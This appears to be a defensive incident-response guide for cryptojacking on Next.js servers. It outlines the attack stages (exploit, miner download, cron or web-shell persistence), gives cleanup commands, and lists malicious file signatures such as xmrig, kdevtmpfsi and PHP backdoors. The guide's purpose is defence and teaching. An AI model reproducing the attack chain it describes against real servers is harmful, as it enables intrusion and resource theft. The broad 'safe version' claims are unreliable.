← Back to Dashboard

INCIDENT_RESPONSE: RCE & CRYPTOJACKING

SCENARIO: CPU at 100%. Malicious binaries (xmrig, kdevtmpfsi) or random .php scripts detected in project directories.

PHASE 1 Anatomy of the Attack

Stage	Action	Purpose
1. Entry	Exploit Vulnerability	Uses flaws (like Next.js RSC bug) to execute `curl` or `wget`.
2. Payload	Download Miner	Server fetches `xmrig` and a `config.json`.
3. Persistence	Install Backdoor	Creates Cron Jobs or web shells to ensure auto-restart.
4. Execution	Start Mining	Server mines Monero, exhausting CPU resources.

PHASE 2 Identification & Containment

Stop the "heartbeat" of the attack and clear the re-infection loop.

# 1. Stop the CPU Drain
ps aux | grep xmrig
sudo kill -9 [PID]

# 2. Check for Persistence (The Re-infection Loop)
crontab -l
# Look for suspicious URLs/scripts. Use 'crontab -e' to purge.

PHASE 3 Remediation (Clean Room)

Compare against git and rotate all secrets.

# Check for untracked malicious files
git status

# Update Next.js to safe versions:
# Safe: 15.x.x | 14.2.11+ | 13.5.7+

PHASE 4 Prevention Checklist

Auto-Updates: Use Dependabot for high-severity CVEs.

WAF: Use Cloudflare/Vercel firewall to block RCE patterns.

Least Privilege: Never run Next.js as root.

Read-Only FS: Use read-only Docker containers where possible.

Summary: Malicious File Signatures

File Name	Type	Threat
`xmrig` / `kdevtmpfsi`	Binary	Critical: Crypto Miner
`*.php` / `shell.py`	Script	Critical: Remote Backdoor
`.hidden_folder`	Directory	Medium: Hides Malicious Assets